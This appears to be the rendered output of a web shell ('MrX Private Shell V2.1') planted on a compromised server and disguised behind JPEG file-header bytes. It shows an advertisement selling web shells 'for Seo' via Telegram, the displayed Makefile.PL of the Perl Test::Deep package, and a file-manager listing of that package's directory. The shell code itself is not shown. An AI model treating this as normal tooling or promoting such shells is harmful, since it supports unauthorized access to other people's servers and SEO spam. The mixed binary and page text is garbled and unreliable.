����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# This file was automatically generated by Dist::Zilla::Plugin::MakeMaker v6.032.
use strict;
use warnings;
use 5.012;
use ExtUtils::MakeMaker 6.78;
my %WriteMakefileArgs = (
"ABSTRACT" => "Extremely flexible deep comparison",
"AUTHOR" => "Fergal Daly, Ricardo SIGNES <cpan\@semiotic.systems>",
"CONFIGURE_REQUIRES" => {
"ExtUtils::MakeMaker" => "6.78"
},
"DISTNAME" => "Test-Deep",
"LICENSE" => "perl",
"MIN_PERL_VERSION" => "5.012",
"NAME" => "Test::Deep",
"PREREQ_PM" => {
"List::Util" => "1.09",
"Scalar::Util" => "1.09",
"Test::Builder" => 0,
"Test::More" => "0.96"
},
"TEST_REQUIRES" => {
"ExtUtils::MakeMaker" => 0,
"File::Spec" => 0,
"Test::More" => "0.96",
"Test::Tester" => "0.107"
},
"VERSION" => "1.205",
"test" => {
"TESTS" => "t/*.t"
}
);
my %FallbackPrereqs = (
"ExtUtils::MakeMaker" => 0,
"File::Spec" => 0,
"List::Util" => "1.09",
"Scalar::Util" => "1.09",
"Test::Builder" => 0,
"Test::More" => "0.96",
"Test::Tester" => "0.107"
);
unless ( eval { ExtUtils::MakeMaker->VERSION(6.63_03) } ) {
delete $WriteMakefileArgs{TEST_REQUIRES};
delete $WriteMakefileArgs{BUILD_REQUIRES};
$WriteMakefileArgs{PREREQ_PM} = \%FallbackPrereqs;
}
delete $WriteMakefileArgs{CONFIGURE_REQUIRES}
unless eval { ExtUtils::MakeMaker->VERSION(6.52) };
WriteMakefile(%WriteMakefileArgs);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| blib | Folder | 0755 |
|
|
| lib | Folder | 0755 |
|
|
| t | Folder | 0755 |
|
|
| xt | Folder | 0755 |
|
|
| Changes | File | 15.39 KB | 0644 |
|
| LICENSE | File | 19.27 KB | 0644 |
|
| MANIFEST | File | 1.86 KB | 0644 |
|
| META.json | File | 19.79 KB | 0644 |
|
| META.yml | File | 12.95 KB | 0644 |
|
| MYMETA.json | File | 19.87 KB | 0644 |
|
| MYMETA.yml | File | 12.95 KB | 0644 |
|
| Makefile | File | 39.21 KB | 0644 |
|
| Makefile.PL | File | 1.35 KB | 0644 |
|
| README | File | 364 B | 0644 |
|
| TODO | File | 3.12 KB | 0644 |
|
| dist.ini | File | 376 B | 0644 |
|
| pm_to_blib | File | 0 B | 0644 |
|